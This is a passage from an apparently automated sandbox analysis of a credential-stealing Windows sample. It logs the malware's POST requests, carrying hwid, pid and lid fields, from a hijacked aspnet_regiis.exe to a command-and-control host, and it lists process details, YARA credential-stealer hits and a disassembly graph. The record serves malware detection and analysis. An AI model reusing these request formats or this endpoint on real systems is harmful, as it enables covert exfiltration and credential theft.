                                                                                                                                                                                                                                            2024-12-27 21:38:13 UTC5089OUTData Raw: 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii: M?lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                            2024-12-27 21:38:14 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 21:38:13 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=uelf38aoocgj3hunnr7in966pr; expires=Tue, 22 Apr 2025 15:24:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GCRQLDhsqe3HhsQXW32pV0ULUscAiI5vIOapcNtOq2xcnoUrgB6J8ZkATyJtYy5rHrRpn%2FNlRHgtLGK0ZamOik5MpnPeWBk1sD5L%2FsLeFIDty5RUlTlb2R9TJDwUMc5w8fw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8c74d10a4342bc-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2130&min_rtt=2096&rtt_var=810&sent=15&recv=26&lost=0&retrans=0&sent_bytes=2834&recv_bytes=21377&delivery_rate=1393129&cwnd=225&unsent_bytes=0&cid=2d7df55d421ff584&ts=942&x=0"
                                                                                                                                                                                                                                            2024-12-27 21:38:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2024-12-27 21:38:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            6192.168.2.449737104.21.66.864434820C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-27 21:38:15 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=LYXP6LOCU8472NMT2QZ
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 1284
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2024-12-27 21:38:15 UTC1284OUTData Raw: 2d 2d 4c 59 58 50 36 4c 4f 43 55 38 34 37 32 4e 4d 54 32 51 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 39 31 37 45 43 36 41 45 39 46 43 44 39 32 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4c 59 58 50 36 4c 4f 43 55 38 34 37 32 4e 4d 54 32 51 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 59 58 50 36 4c 4f 43 55 38 34 37 32 4e 4d 54 32 51 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 61 61
                                                                                                                                                                                                                                            Data Ascii: --LYXP6LOCU8472NMT2QZContent-Disposition: form-data; name="hwid"2917EC6AE9FCD922BEBA0C6A975F1733--LYXP6LOCU8472NMT2QZContent-Disposition: form-data; name="pid"1--LYXP6LOCU8472NMT2QZContent-Disposition: form-data; name="lid"HpOoIh--aa
                                                                                                                                                                                                                                            2024-12-27 21:38:16 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 21:38:16 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=o8kfeabgq4o4iigegqm3lm232o; expires=Tue, 22 Apr 2025 15:24:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hgqJzoJKaRlFNL%2BnR%2Fq7xMaBrq0KTfG7dZuCChIcf9EcXzmsoMYxOOLIRetIMFaevExyzCapTrTfZIHxfKIPlRV%2B%2Fed7gcR0RfEGCtYtdGq5HDqCLrG7riczNNTqqLs44n4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8c74e17d4d435d-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1584&rtt_var=604&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2201&delivery_rate=1796923&cwnd=128&unsent_bytes=0&cid=52d3a1860076e5b9&ts=777&x=0"
                                                                                                                                                                                                                                            2024-12-27 21:38:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2024-12-27 21:38:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            7192.168.2.449739104.21.66.864434820C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-27 21:38:17 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=EZMLRP7PI78R7N
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 1110
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2024-12-27 21:38:17 UTC1110OUTData Raw: 2d 2d 45 5a 4d 4c 52 50 37 50 49 37 38 52 37 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 39 31 37 45 43 36 41 45 39 46 43 44 39 32 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 45 5a 4d 4c 52 50 37 50 49 37 38 52 37 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 5a 4d 4c 52 50 37 50 49 37 38 52 37 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 61 61 64 62 38 38 30 64 61 38 33 64 0d 0a 2d 2d 45
                                                                                                                                                                                                                                            Data Ascii: --EZMLRP7PI78R7NContent-Disposition: form-data; name="hwid"2917EC6AE9FCD922BEBA0C6A975F1733--EZMLRP7PI78R7NContent-Disposition: form-data; name="pid"1--EZMLRP7PI78R7NContent-Disposition: form-data; name="lid"HpOoIh--aadb880da83d--E
                                                                                                                                                                                                                                            2024-12-27 21:38:19 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 21:38:19 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=390ddpmq7jtf2usu4elp8ko5ac; expires=Tue, 22 Apr 2025 15:24:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3WPpADHTSwGIwbsXvrsnvbIZ9tWxe4e%2FSJS%2Fvo2Bo7%2FbP0jWzsk2twBcB%2F6EeHdGuXCQSqCTjPfiN2yC4Ake7igWJexaKOkxUW9F7uWEF%2F74%2FEHtcMWx3eozFhu9%2BviHePY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8c74eeeaed0f9d-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1559&rtt_var=594&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2022&delivery_rate=1872995&cwnd=193&unsent_bytes=0&cid=8ae01d3f3663ecb5&ts=1755&x=0"
                                                                                                                                                                                                                                            2024-12-27 21:38:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2024-12-27 21:38:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                            Start time:16:37:54
                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\ForcesLangi.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\ForcesLangi.exe"
                                                                                                                                                                                                                                            Imagebase:0x6d0000
                                                                                                                                                                                                                                            File size:661'504 bytes
                                                                                                                                                                                                                                            MD5 hash:64F1ABE3F2F65E545C54B23809C06583
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                            Start time:16:37:54
                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                            Start time:16:37:55
                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                                                                                                                                                                            Imagebase:0x7e0000
                                                                                                                                                                                                                                            File size:43'016 bytes
                                                                                                                                                                                                                                            MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1831814063.0000000002A74000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1832206097.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1831883195.0000000002A7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:11.7%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:16.8%
                                                                                                                                                                                                                                              Total number of Nodes:1016
                                                                                                                                                                                                                                              Total number of Limit Nodes:7
                                                                                                                                                                                                                                              execution_graph 13034 6ce30d83 13035 6ce30dbc 13034->13035 13036 6ce30d8c 13034->13036 13036->13035 13043 6ce30fc9 13036->13043 13038 6ce30dc7 13039 6ce30fc9 47 API calls 13038->13039 13040 6ce30dd2 13039->13040 13056 6ce323f5 13040->13056 13044 6ce30fd7 23 API calls 13043->13044 13045 6ce30fce 13044->13045 13045->13038 13046 6ce34a82 __fassign 2 API calls 13045->13046 13047 6ce32490 13046->13047 13048 6ce3249b 13047->13048 13049 6ce34ac7 __fassign 37 API calls 13047->13049 13050 6ce324a5 IsProcessorFeaturePresent 13048->13050 13055 6ce324c4 13048->13055 13049->13048 13051 6ce324b1 13050->13051 13054 6ce313fc __fassign 8 API calls 13051->13054 13052 6ce31bd8 __fassign 23 API calls 13053 6ce324ce 13052->13053 13054->13055 13055->13052 13057 6ce32401 ___scrt_is_nonwritable_in_current_image 13056->13057 13058 6ce329a7 __fassign 37 API calls 13057->13058 13059 6ce32406 13058->13059 13060 6ce3248b __fassign 37 API calls 13059->13060 13061 6ce32430 13060->13061 13062 6ce29cc0 13066 6ce29d13 13062->13066 13063 6ce2a2f3 13064 6ce2e610 _ValidateLocalCookies 5 API calls 13063->13064 13065 6ce2a303 13064->13065 13066->13063 13068 6ce2b620 13066->13068 13072 6ce2b66d 13068->13072 13069 6ce2bfc9 13070 6ce2e610 _ValidateLocalCookies 5 API calls 13069->13070 13071 6ce2bfd3 13070->13071 13071->13066 13072->13069 13073 6ce2b050 14 API calls 13072->13073 13073->13072 13074 6ce26580 13075 6ce265db 13074->13075 13077 6ce26978 13075->13077 13080 6ce269c0 13075->13080 13078 6ce2e610 _ValidateLocalCookies 5 API calls 13077->13078 13079 6ce26988 13078->13079 13084 6ce26a13 13080->13084 13081 6ce26faa 13082 6ce2e610 _ValidateLocalCookies 5 API calls 13081->13082 13083 6ce26fba 13082->13083 13083->13075 13084->13081 13086 6ce27100 13084->13086 13088 6ce27118 std::bad_exception::bad_exception 13086->13088 13087 6ce27830 13087->13084 13088->13087 13089 6ce2fb2c 25 API calls ___std_exception_copy 13088->13089 13089->13088 13090 6ce30e80 13091 6ce30e92 13090->13091 13093 6ce30ea0 13090->13093 13092 6ce2e610 _ValidateLocalCookies 5 API calls 13091->13092 13092->13093 13094 6ce30b00 13095 6ce30b1e 13094->13095 13106 6ce30ac0 13095->13106 13107 6ce30ad2 13106->13107 13108 6ce30adf 13106->13108 13109 6ce2e610 _ValidateLocalCookies 5 API calls 13107->13109 13109->13108 11811 6ce2e9c4 11812 6ce2e9d2 11811->11812 11813 6ce2e9cd 11811->11813 11817 6ce2e88e 11812->11817 11832 6ce2eba8 11813->11832 11819 6ce2e89a ___scrt_is_nonwritable_in_current_image 11817->11819 11818 6ce2e8c3 dllmain_raw 11821 6ce2e8a9 11818->11821 11822 6ce2e8dd dllmain_crt_dispatch 11818->11822 11819->11818 11820 6ce2e8be 11819->11820 11819->11821 11836 6ce0c950 11820->11836 11822->11820 11822->11821 11825 6ce2e92f 11825->11821 11826 6ce2e938 dllmain_crt_dispatch 11825->11826 11826->11821 11828 6ce2e94b dllmain_raw 11826->11828 11827 6ce0c950 __DllMainCRTStartup@12 5 API calls 11829 6ce2e916 11827->11829 11828->11821 11840 6ce2e7de 11829->11840 11831 6ce2e924 dllmain_raw 11831->11825 11833 6ce2ebbe 11832->11833 11835 6ce2ebc7 11833->11835 12157 6ce2eb5b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 11833->12157 11835->11812 11837 6ce0c9b5 11836->11837 11838 6ce2e610 _ValidateLocalCookies 5 API calls 11837->11838 11839 6ce0db70 11838->11839 11839->11825 11839->11827 11841 6ce2e7ea ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 11840->11841 11842 6ce2e886 11841->11842 11843 6ce2e81b 11841->11843 11859 6ce2e7f3 11841->11859 11888 6ce2ef12 IsProcessorFeaturePresent 11842->11888 11867 6ce2ed43 11843->11867 11846 6ce2e88d ___scrt_is_nonwritable_in_current_image 11850 6ce2e8c3 dllmain_raw 11846->11850 11851 6ce2e8be 11846->11851 11863 6ce2e8a9 11846->11863 11847 6ce2e820 11876 6ce2ebff 11847->11876 11849 6ce2e825 __RTC_Initialize __DllMainCRTStartup@12 11879 6ce2eee4 11849->11879 11852 6ce2e8dd dllmain_crt_dispatch 11850->11852 11850->11863 11854 6ce0c950 __DllMainCRTStartup@12 5 API calls 11851->11854 11852->11851 11852->11863 11856 6ce2e8fe 11854->11856 11858 6ce2e92f 11856->11858 11861 6ce0c950 __DllMainCRTStartup@12 5 API calls 11856->11861 11860 6ce2e938 dllmain_crt_dispatch 11858->11860 11858->11863 11859->11831 11862 6ce2e94b dllmain_raw 11860->11862 11860->11863 11864 6ce2e916 11861->11864 11862->11863 11863->11831 11865 6ce2e7de __DllMainCRTStartup@12 79 API calls 11864->11865 11866 6ce2e924 dllmain_raw 11865->11866 11866->11858 11868 6ce2ed48 ___scrt_release_startup_lock 11867->11868 11869 6ce2ed4c 11868->11869 11871 6ce2ed58 __DllMainCRTStartup@12 11868->11871 11892 6ce3221b 11869->11892 11873 6ce2ed65 11871->11873 11895 6ce31a7e 11871->11895 11873->11847 12029 6ce30c5e InterlockedFlushSList 11876->12029 11880 6ce2eef0 11879->11880 11882 6ce2e844 11880->11882 12036 6ce323b3 11880->12036 11885 6ce2e880 11882->11885 11883 6ce2eefe 12041 6ce30cb6 11883->12041 12140 6ce2ed66 11885->12140 11889 6ce2ef28 __DllMainCRTStartup@12 std::bad_exception::bad_exception 11888->11889 11890 6ce2efd3 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11889->11890 11891 6ce2f01e __DllMainCRTStartup@12 11890->11891 11891->11846 11906 6ce320e6 11892->11906 11896 6ce31a8c 11895->11896 11904 6ce31a9d 11895->11904 11977 6ce31b24 GetModuleHandleW 11896->11977 11901 6ce31ad7 11901->11847 11984 6ce31944 11904->11984 11907 6ce320f2 ___scrt_is_nonwritable_in_current_image 11906->11907 11914 6ce32c3a EnterCriticalSection 11907->11914 11909 6ce32100 11915 6ce32141 11909->11915 11914->11909 11916 6ce32160 11915->11916 11917 6ce3210d 11915->11917 11916->11917 11922 6ce32ce7 11916->11922 11919 6ce32135 11917->11919 11976 6ce32c82 LeaveCriticalSection 11919->11976 11921 6ce2ed56 11921->11847 11923 6ce32cf2 HeapFree 11922->11923 11927 6ce32d1b _free 11922->11927 11924 6ce32d07 11923->11924 11923->11927 11928 6ce32dcb 11924->11928 11927->11917 11931 6ce32afe GetLastError 11928->11931 11930 6ce32d0d GetLastError 11930->11927 11932 6ce32b1b 11931->11932 11933 6ce32b15 11931->11933 11953 6ce32b21 SetLastError 11932->11953 11959 6ce3458e 11932->11959 11954 6ce3454f 11933->11954 11940 6ce32b51 11943 6ce3458e __dosmaperr 6 API calls 11940->11943 11941 6ce32b68 11942 6ce3458e __dosmaperr 6 API calls 11941->11942 11944 6ce32b74 11942->11944 11945 6ce32b5f 11943->11945 11946 6ce32b89 11944->11946 11947 6ce32b78 11944->11947 11948 6ce32ce7 _free 12 API calls 11945->11948 11971 6ce327a9 11946->11971 11949 6ce3458e __dosmaperr 6 API calls 11947->11949 11948->11953 11949->11945 11952 6ce32ce7 _free 12 API calls 11952->11953 11953->11930 11955 6ce343ef __dosmaperr 5 API calls 11954->11955 11956 6ce3456b 11955->11956 11957 6ce34586 TlsGetValue 11956->11957 11958 6ce34574 11956->11958 11958->11932 11960 6ce343ef __dosmaperr 5 API calls 11959->11960 11961 6ce345aa 11960->11961 11962 6ce32b39 11961->11962 11963 6ce345c8 TlsSetValue 11961->11963 11962->11953 11964 6ce32dde 11962->11964 11969 6ce32deb __dosmaperr 11964->11969 11965 6ce32e2b 11968 6ce32dcb _free 13 API calls 11965->11968 11966 6ce32e16 HeapAlloc 11967 6ce32b49 11966->11967 11966->11969 11967->11940 11967->11941 11968->11967 11969->11965 11969->11966 11970 6ce316aa __dosmaperr EnterCriticalSection LeaveCriticalSection 11969->11970 11970->11969 11972 6ce3263d __dosmaperr EnterCriticalSection LeaveCriticalSection 11971->11972 11973 6ce32817 11972->11973 11974 6ce3274f __dosmaperr 14 API calls 11973->11974 11975 6ce32840 11974->11975 11975->11952 11976->11921 11978 6ce31a91 11977->11978 11978->11904 11979 6ce31b67 GetModuleHandleExW 11978->11979 11980 6ce31b86 GetProcAddress 11979->11980 11981 6ce31b9b 11979->11981 11980->11981 11982 6ce31bb8 11981->11982 11983 6ce31baf FreeLibrary 11981->11983 11982->11904 11983->11982 11985 6ce31950 ___scrt_is_nonwritable_in_current_image 11984->11985 12000 6ce32c3a EnterCriticalSection 11985->12000 11987 6ce3195a 12001 6ce31991 11987->12001 11989 6ce31967 12005 6ce31985 11989->12005 11992 6ce31ae2 12009 6ce32d21 GetPEB 11992->12009 11995 6ce31b11 11998 6ce31b67 __DllMainCRTStartup@12 3 API calls 11995->11998 11996 6ce31af1 GetPEB 11996->11995 11997 6ce31b01 GetCurrentProcess TerminateProcess 11996->11997 11997->11995 11999 6ce31b19 ExitProcess 11998->11999 12000->11987 12002 6ce3199d ___scrt_is_nonwritable_in_current_image 12001->12002 12003 6ce3221b __DllMainCRTStartup@12 14 API calls 12002->12003 12004 6ce319fe __DllMainCRTStartup@12 12002->12004 12003->12004 12004->11989 12008 6ce32c82 LeaveCriticalSection 12005->12008 12007 6ce31973 12007->11901 12007->11992 12008->12007 12010 6ce32d3b 12009->12010 12011 6ce31aec 12009->12011 12013 6ce34472 12010->12013 12011->11995 12011->11996 12016 6ce343ef 12013->12016 12015 6ce3448e 12015->12011 12017 6ce3441d 12016->12017 12021 6ce34419 __dosmaperr 12016->12021 12017->12021 12022 6ce34328 12017->12022 12020 6ce34437 GetProcAddress 12020->12021 12021->12015 12027 6ce34339 ___vcrt_InitializeCriticalSectionEx 12022->12027 12023 6ce34357 LoadLibraryExW 12024 6ce34372 GetLastError 12023->12024 12023->12027 12024->12027 12025 6ce343cd FreeLibrary 12025->12027 12026 6ce343e4 12026->12020 12026->12021 12027->12023 12027->12025 12027->12026 12028 6ce343a5 LoadLibraryExW 12027->12028 12028->12027 12031 6ce30c6e 12029->12031 12032 6ce2ec09 12029->12032 12031->12032 12033 6ce3173e 12031->12033 12032->11849 12034 6ce32ce7 _free 14 API calls 12033->12034 12035 6ce31756 12034->12035 12035->12031 12037 6ce323be 12036->12037 12040 6ce323d0 ___scrt_uninitialize_crt 12036->12040 12038 6ce323cc 12037->12038 12047 6ce34f9d 12037->12047 12038->11883 12040->11883 12042 6ce30cc9 12041->12042 12043 6ce30cbf 12041->12043 12042->11882 12113 6ce3109c 12043->12113 12050 6ce34e4b 12047->12050 12053 6ce34d9f 12050->12053 12054 6ce34dab ___scrt_is_nonwritable_in_current_image 12053->12054 12061 6ce32c3a EnterCriticalSection 12054->12061 12056 6ce34e21 12070 6ce34e3f 12056->12070 12058 6ce34db5 ___scrt_uninitialize_crt 12058->12056 12062 6ce34d13 12058->12062 12061->12058 12063 6ce34d1f ___scrt_is_nonwritable_in_current_image 12062->12063 12073 6ce350ba EnterCriticalSection 12063->12073 12065 6ce34d29 ___scrt_uninitialize_crt 12066 6ce34d62 12065->12066 12074 6ce34f55 12065->12074 12084 6ce34d93 12066->12084 12112 6ce32c82 LeaveCriticalSection 12070->12112 12072 6ce34e2d 12072->12038 12073->12065 12075 6ce34f62 12074->12075 12076 6ce34f6b 12074->12076 12078 6ce34e4b ___scrt_uninitialize_crt 66 API calls 12075->12078 12087 6ce34ef0 12076->12087 12079 6ce34f68 12078->12079 12079->12066 12082 6ce34f87 12100 6ce36572 12082->12100 12111 6ce350ce LeaveCriticalSection 12084->12111 12086 6ce34d81 12086->12058 12088 6ce34f08 12087->12088 12089 6ce34f2d 12087->12089 12088->12089 12090 6ce35298 ___scrt_uninitialize_crt 25 API calls 12088->12090 12089->12079 12093 6ce35298 12089->12093 12091 6ce34f26 12090->12091 12092 6ce36d6a ___scrt_uninitialize_crt 